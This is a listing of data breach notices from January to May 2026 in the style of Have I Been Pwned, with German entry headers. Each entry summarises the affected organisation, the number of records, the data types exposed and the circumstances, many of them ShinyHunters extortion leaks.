| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers. |
||
| 30.04.2026 - Reborn Gaming | 126 Datensätze geleaked | |
| Email addresses, IP addresses In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned. |
||
| 28.04.2026 - Vimeo | 119.167 Datensätze geleaked | |
| Email addresses, Names In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information". |
||
| 26.04.2026 - CTT | 468.124 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel. |
||
| 24.04.2026 - Udemy | 1.401.259 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses In April 2026, online training company Udemy was the victim of a “pay or leak” extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer. |
||
| 20.04.2026 - ADT | 5.488.888 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people. |
||
| 20.04.2026 - Aman | 215.563 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes. |
||
| 20.04.2026 - Canada Life | 237.810 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data. |
||
| 20.04.2026 - Pitney Bowes | 8.243.989 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles. |
||
| 18.04.2026 - Carnival | 7.531.359 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity. |
||
| 15.04.2026 - Zara | 197.376 Datensätze geleaked | |
| Email addresses, Geographic locations, Purchases, Support tickets In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident didn't affect passwords or payment information. |
||
| 14.04.2026 - Abrigo | 711.099 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from Abrigo's Salesforce compromise via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely that it was "business contact information" including "institution name, employee name, email addresses, and phone numbers". |
||
| 12.04.2026 - Marcus & Millichap | 1.837.078 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information". |
||
| 10.04.2026 - McGraw Hill | 13.500.136 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. Attributed to a Salesforce misconfiguration, the company stated the incident exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records. |
||
| 08.04.2026 - 7-Eleven | 185.256 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data later published that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data. |
||
| 07.04.2026 - My Lovely AI | 106.271 Datensätze geleaked | |
| Email addresses, Social media profiles In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. |
||
| 06.04.2026 - LegionProxy | 10.144 Datensätze geleaked | |
| Email addresses, Names, Passwords, Purchases In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases. |
||
| 03.04.2026 - Amtrak | 2.147.679 Datensätze geleaked | |
| Email addresses, Names, Physical addresses, Support tickets In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data which contained over 2M unique email addresses along with names, physical addresses and customer support records. |
||
| 02.04.2026 - SongTrivia2 | 291.739 Datensätze geleaked | |
| Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. |
||
| 31.03.2026 - Hallmark | 1.736.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. |
||
| 27.03.2026 - ZenBusiness | 5.118.184 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In March 2026, the hacker and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file. |
||
| 26.03.2026 - BreachForums Version 5 | 339.778 Datensätze geleaked | |
| Email addresses, Passwords, Usernames In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes. |
||
| 25.03.2026 - Addi | 34.532.941 Datensätze geleaked | |
| Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points. |
||
| 25.03.2026 - Sound Radix | 292.993 Datensätze geleaked | |
| Email addresses, Names, Passwords In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted. |
||
| 13.03.2026 - Divine Skins | 105.814 Datensätze geleaked | |
| Email addresses, Purchases, Usernames In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. |
||
| 12.03.2026 - Crunchyroll | 1.195.684 Datensätze geleaked | |
| Email addresses In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP. |
||
| 08.03.2026 - Baydöner | 1.266.822 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. |
||
| 06.03.2026 - Aura | 903.080 Datensätze geleaked | |
| Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. |
||
| 04.03.2026 - SUCCESS | 253.510 Datensätze geleaked | |
| Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. |
||
| 04.03.2026 - Woflow | 447.593 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In March 2026, the AI-driven merchant data platform Woflow was named as a victim by the ShinyHunters data extortion group. The group subsequently published tens of thousands of files allegedly obtained from the company, comprising more than 2TB of data. The trove included hundreds of thousands of email addresses, names, phone numbers and physical addresses, with the data indicating it related to Woflow customers and, in turn, the customers of merchants using their platform. |
||
| 25.02.2026 - KomikoAI | 1.060.191 Datensätze geleaked | |
| AI prompts, Email addresses, Forum posts, Names In February, the AI-powered comic generation platform KomikoAI suffered a data breach. The incident exposed 1M unique email addresses along with names, user posts and the AI prompts used to generate content. The exposed data enables the mapping of individual AI prompts to specific email addresses. |
||
| 25.02.2026 - Lovora | 495.556 Datensätze geleaked | |
| Display names, Email addresses, Profile photos In February 2026, the couples and relationship app Lovora allegedly suffered a data breach that exposed 496k unique email addresses. The data also included users’ display names and profile photos, along with other personal information collected through use of the app. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident. |
||
| 17.02.2026 - Quitbro | 22.874 Datensätze geleaked | |
| Email addresses, Partial dates of birth, Usernames In February 2026, the porn addiction app Quitbro allegedly suffered a data breach that exposed 23k unique email addresses. The data also included users’ years of birth, responses to questions within the app and their last recorded relapse time. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident. |
||
| 14.02.2026 - CarGurus | 12.461.887 Datensätze geleaked | |
| Email addresses, IP addresses, Names, Phone numbers, Physical addresses In February 2026, the automotive marketplace CarGurus was the target of a data breach attributed to the threat actor ShinyHunters. Following an attempted extortion, the data was published publicly and contained more than 12M email addresses across multiple files including user account ID mappings, finance pre-qualification application data and dealer account and subscription information. Impacted data also included names, phone numbers, physical and IP addresses, and auto finance application outcomes. |
||
| 12.02.2026 - Odido | 6.077.025 Datensätze geleaked | |
| Bank account numbers, Customer service comments, Dates of birth, Driver's licenses, Email addresses, Genders, Government issued IDs, Names, Passport numbers, Phone numbers, Physical addresses In February 2026, Dutch telco Odido was the victim of a data breach and subsequent extortion attempt. Shortly after, a total of 6M unique email addresses were published across four separate data releases over consecutive days. The exposed data includes names, physical addresses, phone numbers, bank account numbers, dates of birth, customer service notes and passport, driver’s licence and European national ID numbers. Odido has published a disclosure notice including an FAQ to support affected customers. |
||
| 06.02.2026 - Toy Battles | 1.017 Datensätze geleaked | |
| Chat logs, Email addresses, IP addresses, Usernames In February 2026, the online gaming community Toy Battles suffered a data breach. The incident exposed 1k unique email addresses alongside usernames, IP addresses and chat logs. Following the breach, Toy Battles self-submitted the data to Have I Been Pwned. |
||
| 30.01.2026 - Association Nationale des Premiers Secours | 5.600 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Places of birth, Salutations In January 2026, a data breach impacting the French non-profit Association Nationale des Premiers Secours (ANPS) was posted to a hacking forum. The breach exposed 5.6k unique email addresses along with names, dates of birth and places of birth. ANPS self-submitted the data to HIBP and advised the incident was traced back to a legacy system and did not impact health data, financial information or passwords. |
||
| 30.01.2026 - Provecho | 712.904 Datensätze geleaked | |
| Email addresses, Usernames In early 2026, data purportedly sourced from the recipe and meal planning service Provecho was alleged to have been obtained in a breach. The exposed data included 713k unique email address along with username and the creator account holders followed. Provecho has been notified and is aware of the claims surrounding the incident. |
||
| 28.01.2026 - Figure | 967.178 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses In February 2026, data obtained from the fintech lending platform Figure was publicly posted online. The exposed data, dating back to January 2026, contained over 900k unique email addresses along with names, phone numbers, physical addresses and dates of birth. Figure confirmed the incident and attributed it to a social engineering attack in which an employee was tricked into providing access. |
||
| 24.01.2026 - CarMax | 431.371 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In January 2026, data allegedly sourced from US automotive retailer CarMax was published online following a failed extortion attempt. The data included 431k unique email addresses along with names, phone numbers and physical addresses. |
||